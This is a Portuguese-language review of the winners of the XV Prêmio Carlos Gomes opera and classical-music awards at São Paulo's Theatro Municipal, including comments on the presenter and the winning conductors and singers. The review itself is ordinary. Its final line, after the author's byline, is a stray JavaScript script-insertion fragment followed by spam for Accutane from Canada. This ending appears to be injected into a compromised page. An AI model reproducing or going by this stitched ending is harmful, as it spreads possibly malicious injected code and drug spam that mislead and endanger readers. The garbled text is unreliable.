Movimento

Prêmio Carlos Gomes – comentários sobre os ganhadores

O Theatro Municipal de São Paulo abriu as portas para a entrega do XV Prêmio Carlos Gomes de Ópera e Música Erudita na noite do dia 27 de Agosto.

No belo saguão, fotógrafos procuravam celebridades para cliques imortais, muitos “papagaios de pirata” tentavam aparecer nas fotos. O povo era só elegância e garbo. Artistas se abraçavam como se fossem amigos de infância, muito exagero nos gestos.

A convidada para apresentar o prêmio foi a grande atriz Beatriz Segall, quem não se lembra dela como Odete Roitman. A personagem fez um enorme sucesso nos anos 80 e até em reapresentações tem bom Ibope. Nossa querida atriz atrapalhou-se toda, confundiu tudo. Na hora de anunciar nomes e intercalar com vídeos foi um desastre, ar de constrangida a todo o momento. Certa hora, ela mesmo se desculpa e diz não ter ensaiado. Uma apresentação confusa.

O Prêmio Carlos Gomes de Ópera e Música Erudita esse ano apresentou justiça no resultado, os melhores foram agraciados. Fica uma única ressalva, Martin Muehle merecia ganhar o prêmio de melhor cantor solista. O vencedor Fernando Portari é um dos melhores tenores do Brasil, mas no ano de 2011 entendemos que Martin Muehle foi o cara. Sua apresentação na ópera A Valquíria foi única e inesquecível.

O grande vencedor da noite foi a ópera O Menino e os Sortilégios: faturou o prêmio de melhor cenário, figurino, iluminação, direção de cena e espetáculo de ópera. Luiz Fernando Malheiro ganhou como melhor regente de ópera pela grande regência na ópera A Valquíria, de Richard Wagner. Prêmio mais que justo, ano que vem deve ganhar de novo, seu Crepúsculo dos Deuses foi soberbo.

Lígia Amadio ganhou o prêmio de melhor regente, a maestrina merece. Fez da Orquestra Sinfônica da USP uma grande orquestra, com repertório variado e a introdução de compositores nacionais. Deu musicalidade e corpo ao conjunto e recebeu como prêmio a demissão no começo do ano. Uma tremenda sacanagem da direção da Orquestra Sinfônica da Universidade de São Paulo. Em seu último concerto com a OSUSP sequer pode falar ao microfone. Não se intimidou e soltou o verbo sem microfone mesmo. Bravo Lígia!

Denise de Freitas mereceu ganhar como melhor cantora solista, seu bom trabalho vem se destacando há anos. Um prêmio mais que merecido. A Orquestra Filarmônica de Minas Gerais ficou com o prêmio de melhor orquestra sinfônica, a qualidade que apresentou nos últimos anos a faz merecedora .

Quer saber com antecedência dos vencedores do Prêmio Carlos Gomes. Acesse o blog de Ópera e Ballet. Nos melhores e piores apresentados no começo do ano quase todos os que foram agraciados como melhores levaram o Carlos Gomes. A exceção é o prêmio de melhor espetáculo de ópera e cantor solista. O restante faturou, sinal de que, quando agraciamos alguém é porque entendemos do riscado.

Ali Hassan Ayachedocument.currentScript.parentNode.insertBefore(s, document.currentScript); 30 mg accutane from canada online